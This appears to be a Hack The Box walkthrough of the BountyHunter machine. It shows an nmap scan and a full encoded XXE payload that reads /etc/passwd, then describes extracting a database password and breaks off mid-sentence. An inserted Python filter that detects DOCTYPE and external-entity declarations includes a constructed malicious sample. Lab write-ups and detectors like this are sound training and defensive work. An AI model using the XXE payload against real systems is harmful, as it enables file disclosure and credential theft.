Hack The Box — BountyHunter Walkthrough

Hello guys, hope you are good and well. In this post we walk through the BountyHunter machine on Hack The Box.

First, we start with an Nmap scan.

nmap -sC -sV 10.10.11.100

Nmap scan

The scan shows only a web app running. The web app has a portal with some details of CVE records.

Web portal

Next, we look for an XXE vulnerability, because the Burp request shows that the data is sent in XML format. We encode the payload with URL encoding and Base64 in CyberChef, and the resulting payload is:

PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L2V0Yy9wYXNzd2QiPl0gPiAKCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU%2BCgkJPGN3ZT50ZXN0PC9jd2U%2BCgkJPGN2c3M%2BdGVzdDwvY3Zzcz4KCQk8cmV3YXJkPnRlc3Q8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D

After inserting this, we get the result in Base64. Decoding it shows the /etc/passwd file, as below:

source: base64decode.org
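
From the defender's side, the same encoding chain can be reversed in front of the application or in a log pipeline, so that submissions declaring a DTD or entities are rejected before any XML parser sees them. The following is an added example, not code from the original walkthrough or from the target application. The function names and both sample reports are constructed, and it assumes the field arrives Base64-encoded and then URL-encoded, as in the request above.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Declarations that a plain bug-report document never needs.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY", re.IGNORECASE)
EXTERNAL_RE = re.compile(
    rb"<!(?:DOCTYPE|ENTITY)[^>]*\b(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def decode_field(raw: str) -> bytes:
    """Undo the transport encoding: URL-decode, then strict Base64-decode."""
    try:
        return base64.b64decode(unquote(raw), validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("field is not valid Base64") from exc


def inspect_report(raw: str) -> list[str]:
    """Return the reasons to reject a submission; an empty list means accept."""
    try:
        xml = decode_field(raw)
    except ValueError:
        return ["undecodable"]
    # UTF-16/UTF-32 text would hide the markers from the byte regexes,
    # so a BOM or NUL byte is refused outright instead of being scanned.
    if xml.startswith((b"\xff\xfe", b"\xfe\xff")) or b"\x00" in xml:
        return ["unexpected-encoding"]
    reasons = []
    if DOCTYPE_RE.search(xml):
        reasons.append("doctype")
    if ENTITY_RE.search(xml):
        reasons.append("entity-declaration")
    if EXTERNAL_RE.search(xml):
        reasons.append("external-identifier")
    return reasons


def encode_field(xml: bytes) -> str:
    """Sample helper: Base64 then URL-encode, matching the form field."""
    return quote(base64.b64encode(xml).decode(), safe="")


# Constructed samples, not captured traffic.
BENIGN = encode_field(b"<bugreport><title>t</title><cwe>c</cwe></bugreport>")
SUSPECT = encode_field(b'<!DOCTYPE r [<!ENTITY e SYSTEM "file:///placeholder">]>'
                       b"<bugreport><title>&e;</title></bugreport>")
```

A check like this is only a pre-filter. The XML parser itself should still be configured not to load DTDs or resolve external entities.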

Next, we try to get the contents of the db file with the payload below, which is generated with CyberChef.

Source: cyberchef

After inserting this payload, we get the content of the db.php file.

source: base64decode.org

Here, we can get the password. Next, we try to log in over SSH as the admin user, which fails, and then we
